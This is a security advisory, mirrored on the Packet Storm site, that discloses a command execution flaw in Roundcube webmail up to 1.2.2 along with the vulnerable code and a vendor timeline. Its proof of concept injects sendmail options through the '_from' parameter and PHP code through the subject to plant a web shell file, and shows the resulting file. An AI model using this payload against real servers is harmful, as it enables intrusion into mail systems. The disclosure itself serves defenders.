exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Roundcube 1.2.2 Command Execution

Roundcube 1.2.2 Command Execution
Posted Dec 9, 2016
Authored by Robin Peraglie

Roundcube version 1.2.2 suffers from a command execution vulnerability via email.

tags | exploit
SHA-256 | c33ac8a7ad33eb2dedca6d6c33967345233c61a99ebffb04c4373835fe6c8ff6

Roundcube 1.2.2 Command Execution

Change Mirror Download
Roundcube 1.2.2: Command Execution via Email
============================================
You can find the online version of the advisory here:
https://blog.ripstech.com/2016/roundcube-command-execution-via-email/

Found by Robin Peraglie with RIPS

Introduction
------------
Roundcube is a widely distributed open-source webmail software used by
many organizations and companies around the globe. The mirror on
SourceForge, for example, counts more than 260,000 downloads in the last
12 months which is only a small fraction of the actual users. Once
Roundcube is installed on a server, it provides a web interface for
authenticated users to send and receive emails with their web browser.

Affected Versions: 1.0.0 - 1.2.2

Requirements
------------
- Roundcube must be configured to use PHP's mail() function (by default)
- PHP's mail() function is configured to use sendmail (by default)
- PHP is configured to have safe_mode turned off (by default)
- An attacker must know or guess the absolute path of the webroot

Description
-----------
In Roundcube 1.2.2, and earlier, user-controlled input flows unsanitized
into the fifth argument of a call to PHP's built-in function mail()
which is documented as security critical. The problem is that the
invocation of the mail() function will cause PHP to execute the sendmail
program. The fifth argument allows to pass arguments to this execution
which allows a configuration of sendmail. Since sendmail offers the -X
option to log all mail traffic in a file, an attacker can abuse this
option and spawn a malicious PHP file in the webroot directory of the
attacked server. The following code lines trigger the vulnerability.

program/steps/mail/sendmail.inc
********************************************************************************
$from = rcube_utils::get_input_value('_from', rcube_utils::INPUT_POST,
true, $message_charset);
a(r)
$sent = $RCMAIL->deliver_message($MAIL_MIME, $from, $mailto,$smtp_error,
$mailbody_file, $smtp_opts);
********************************************************************************

Here, the value of the POST parameter "_from" is fetched and Roundcube's
deliver_message() method is invoked with the value used as second
argument $from.

program/lib/Roundcube/rcube.php
********************************************************************************
public function deliver_message(&$message, $from, $mailto, &$error,
&$body_file = null, $options = null) {
a(r)
if (filter_var(ini_get('safe_mode'), FILTER_VALIDATE_BOOLEAN))
$sent = mail($to, $subject, $msg_body, $header_str);
else
$sent = mail($to, $subject, $msg_body, $header_str, "-f$from");
********************************************************************************

This method will then pass the $from parameter to a call of the mail()
function. The idea is to pass a custom "from" header to the sendmail
program via the "-f" option.

Proof of Concept
----------------
When an email is sent with Roundcube, the HTTP request can be
intercepted and altered. Here, the "_from" parameter can be modified in
order to place a malicious PHP file on the system.

********************************************************************************
example@example.com -OQueueDirectory=/tmp -X/var/www/html/rce.php
********************************************************************************

This allows an attacker to spawn a shell file "rce.php" in the web root
directory with the contents of the "_subject" parameter that can contain
PHP code. After performing the request, a file with the following
content is created:

********************************************************************************
04731 >>> Recipient names must be specified
04731 <<< To: squinty@localhost
04731 <<< Subject: <?php phpinfo(); ?>
04731 <<< X-PHP-Originating-Script: 1000:rcube.php
04731 <<< MIME-Version: 1.0
04731 <<< Content-Type: text/plain; charset=US-ASCII;
04731 <<< format=flowed
04731 <<< Content-Transfer-Encoding: 7bit
04731 <<< Date: So, 20 Nov 2016 04:02:52 +0100
04731 <<< From: example@example.com -OQueueDirectory=/tmp
04731 <<< -X/var/www/html/rce.php
04731 <<< Message-ID: <390a0c6379024872a7f0310cdea24900@localhost>
04731 <<< X-Sender: example@example.com -OQueueDirectory=/tmp
04731 <<< -X/var/www/html/rce.php
04731 <<< User-Agent: Roundcube Webmail/1.2.2
04731 <<<
04731 <<< Funny e-mail message
04731 <<< [EOF]
********************************************************************************

Since the email data is unencoded, the subject parameter will be
reflected in plaintext which allows the injection of PHP tags into the
shell file.

Time Line
---------
* 2016/11/21: First contact with vendor
* 2016/11/28: Vendor agrees to coordinated disclosure
* 2016/11/28: Vendor releases updated version Roundcube 1.2.3


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close